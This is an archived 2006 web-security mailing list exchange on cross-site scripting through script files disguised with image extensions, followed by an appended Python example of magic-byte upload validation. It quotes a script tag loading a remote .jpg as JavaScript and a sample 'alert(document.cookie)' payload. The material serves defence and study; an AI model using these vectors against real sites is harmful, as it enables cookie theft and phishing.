[WEB SECURITY] (XSS via file extension) XSS-Phishing on Financial Sites

RSnake rsnake at shocking.com
Mon Jun 26 16:13:22 EDT 2006


 	Sure, it's being treated as an HTML document because the MIME
type is being ignored since the JPEG header is missing.  But that's not
really much of an exploit since it requires the user to click on it
first.

 	It would require some social engineering to make that work, or
at the very least, you'd have to use an iframe or some other XSS exploit
to take advantage of the script you uploaded in place of an image,
unless I'm misunderstanding something.

 	But to answer your question, yes, anything that uploads content
should validate that the content is approved by any TOSs or AUPs in
place.  Unfortunately most people don't realize they need either of
those, so they are vulnerable to all kinds of things.  That kind of
reminds me of the long since fixed GDI+ exploit.  It's an easy thing to
detect and fix, but no one did it.  The closest I saw was a snort
signature that could be defeated by renaming the file.  Content filters
leave a little to be desired in most cases.

-RSnake
http://ha.ckers.org/
http://ha.ckers.org/xss.html
http://ha.ckers.org/blog/feed/

On Mon, 26 Jun 2006, Evans, Arian wrote:

>>  But to answer your question
>> <script src="http://ha.ckers.org/xss.jpg"></script>
>> will continue to work
>
> There are a couple of ways you can do this, as I'm sure
> you are aware, but I haven't seen this well documented
> in the past. This, for example, is all you need in IE:
>
> http://www.anachronic.com/xss/scriptalert.jpg
>
> Anywhere you can embed/reference an image, IE will execute
> script types it understands for image (any) extensions it has
> native shell extension handling configured to use itself for.
>
> If you can get the image to 'render' inline of an existing script,
> you may be able to get away with a simple directive as such:
>
> http://www.anachronic.com/xss/shortalert.jpg
>
> It's quite fun, and most web-based DMSes are vulnerable to
> this type of abuse, say *nothing* of the zillions of sites
> that allow custom avatars.
>
> This is definitely something the browser could kibosh
> short-term, though long term you'd think DMS systems would
> want to validate all user supplied data, including the
> /documents/ themselves.
>
> -ae
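
The server-side check both posters are asking for, written out as an added example (this is not code from the list thread, from RSnake, or from Arian Evans). The weak check trusts the extension, which is exactly why a file named xss.jpg whose body is plain JavaScript passes and then gets executed when a page references it as a script. The stronger check accepts the upload only if the bytes carry the signature of the image type the name claims (a JPEG starts with FF D8 FF, which is the "JPEG header" RSnake notes is missing), and it derives the Content-Type it will serve from the verified bytes rather than from the file name. The sample uploads are constructed here, and the function and variable names are my own.

```python
import os

# Standard file signatures for the image types an avatar/document upload
# form typically claims to accept. Keys are the allowed extensions.
IMAGE_MAGIC = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}

# Content-Type to serve for each verified type (set from the bytes, not
# from whatever name the uploader chose).
SERVE_TYPE = {"jpg": "image/jpeg", "jpeg": "image/jpeg",
              "png": "image/png", "gif": "image/gif"}


def extension_of(filename):
    return os.path.splitext(filename)[1].lower().lstrip(".")


def extension_only_check(filename):
    """The weak check: trust the extension. A .jpg full of JavaScript
    passes, and that is the vector discussed in the thread."""
    return extension_of(filename) in IMAGE_MAGIC


def detected_type(data):
    """Identify the image type from the leading bytes alone, or None if the
    body does not start with any known image signature."""
    for ext, sigs in IMAGE_MAGIC.items():
        if any(data.startswith(sig) for sig in sigs):
            return SERVE_TYPE[ext]
    return None


def validate_upload(filename, data):
    """Return (accepted, reason). Accept only when the extension is on the
    allow-list AND the body starts with that type's signature."""
    ext = extension_of(filename)
    if ext not in IMAGE_MAGIC:
        return False, "extension not in image allow-list"
    if not any(data.startswith(sig) for sig in IMAGE_MAGIC[ext]):
        return False, "body does not start with %s signature" % ext
    return True, "ok"


# Constructed sample uploads (hypothetical; not files from the thread).
PAYLOAD_JPG = b"alert(document.cookie)"              # script with a .jpg name
REAL_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 32
REAL_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00"

if __name__ == "__main__":
    for name, body in (("xss.jpg", PAYLOAD_JPG),
                       ("avatar.jpg", REAL_JPG),
                       ("avatar.gif", REAL_GIF)):
        print(name, "ext-only:", extension_only_check(name),
              "validated:", validate_upload(name, body),
              "serve as:", detected_type(body))
```

A signature check defeats the `<script src="...jpg">` trick because a body that begins with JPEG bytes is a JavaScript syntax error before any payload is reached, but it says nothing about what follows the header, so a stricter upload pipeline re-encodes the image with an image library and stores only the re-encoded output. On the browser side, the short-term "kibosh" Arian asks for later arrived as the `X-Content-Type-Options: nosniff` response header, which makes browsers refuse to run a script response whose Content-Type is not a JavaScript type; serve it alongside the verified Content-Type rather than instead of upload validation.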

----------------------------------------------------------------------------
The Web Security Mailing List: 
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]